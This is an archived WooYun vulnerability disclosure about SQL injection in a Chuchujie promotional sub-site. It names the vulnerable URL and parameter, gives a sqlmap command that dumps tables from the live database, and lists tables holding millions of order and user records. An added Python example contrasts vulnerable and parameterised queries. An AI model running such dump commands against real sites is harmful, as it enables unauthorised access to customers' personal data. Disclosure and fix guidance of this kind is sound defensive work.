WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader ------------- http://drop.zone.ci/
2015-11-10: Details have been sent to the vendor and are awaiting vendor handling.
2015-11-23: The vendor has chosen to ignore the vulnerability; details are now public.
Singles' Day: celebrate, but stay safe. A Chuchujie sub-site has a SQL injection vulnerability (shop pretty, but shop safely), exposing over ten million order records and several million user records.
#1 Injection URL
http://huodong.chuchujie.com:80/20151111/ajax.php?category1=3&action=fgetGoods
Injected parameter: category1
#Proof of vulnerability
python sqlmap.py -u "http://huodong.chuchujie.com:80/20151111/ajax.php?category1=3&action=fgetGoods" -D huodong -T inviteOrders --dump --start 1 --stop 5
Database: huodong
+--------------------------+----------+
| Table                    | Entries  |
+--------------------------+----------+
| inviteOrders             | 10922341 |
| zlUserinfo3              |  7929815 |
| inviteUser               |  7467237 |
| sso_openid               |  4531859 |
| zlUserinfo4              |  3608880 |
| digAlert                 |  3415202 |
| digUser201508            |  1975330 |
| digUser                  |  1953446 |
| digUser201509            |  1626351 |
| digUser201504            |  1575203 |
| digUser201507            |  1465415 |
| digUserGift              |  1418846 |
| digUser201510            |  1329393 |
| digUser201506            |  1325872 |
| zlComment5               |  1066662 |
| digUser201505            |   967930 |
| zlComment12              |   680894 |
| digUserWish              |   559441 |
| rp_getuser               |   536124 |
| springUser               |   515823 |
+--------------------------+----------+
Database: huodong
Table: zlUserinfo3 [5 entries]
Columns: id, itemid, userId, userTel, awardCode, created_on
[5 dumped rows omitted: they contain real user IDs, phone numbers and award codes]

Database: huodong
Table: inviteOrders [5 entries]
Columns: id, cid, skuId, openId, areaId, shopId, productId, orderSN, userTel, userName, userArea, createdOn, version, userAddress
[5 dumped rows omitted: they contain real phone numbers, customer names and delivery addresses]
Filter the input.
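An added example (not the site's code) of the bug class reported here and of the "filter" fix, written in Python against an in-memory SQLite table; the goods table, its columns and its rows are constructed stand-ins for the real huodong schema, and the function names are assumptions.

```python
import sqlite3


def make_db():
    # Constructed sample data standing in for the site's "huodong" database;
    # the table name, columns and rows are assumptions, not the real schema.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE goods (id INTEGER, category1 INTEGER, name TEXT)")
    db.executemany(
        "INSERT INTO goods VALUES (?, ?, ?)",
        [(1, 3, "coat"), (2, 3, "boots"), (3, 5, "bag")],
    )
    return db


def fget_goods_vulnerable(db, category1):
    # Mirrors the reported defect: the request parameter is spliced straight
    # into the SQL text, so whatever it contains is parsed as part of the query.
    sql = "SELECT id, name FROM goods WHERE category1 = " + category1 + " ORDER BY id"
    return db.execute(sql).fetchall()


def fget_goods_fixed(db, category1):
    # "Filter" as the report recommends: category1 is a numeric id, so reject
    # anything that is not a plain ASCII integer before it reaches the database...
    if not isinstance(category1, str) or not (category1.isascii() and category1.isdigit()):
        raise ValueError("category1 must be a non-negative integer")
    # ...and bind it as a parameter so the value can never be read as SQL syntax.
    sql = "SELECT id, name FROM goods WHERE category1 = ? ORDER BY id"
    return db.execute(sql, (int(category1),)).fetchall()
```

With a well-formed request both variants return the same rows; the difference shows only when the parameter carries anything other than a number, which the fixed version refuses outright.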
Severity: no impact (vendor ignored)
Ignored at: 2015-11-23 09:30
Vulnerability Rank: 15 (WooYun rating)
None yet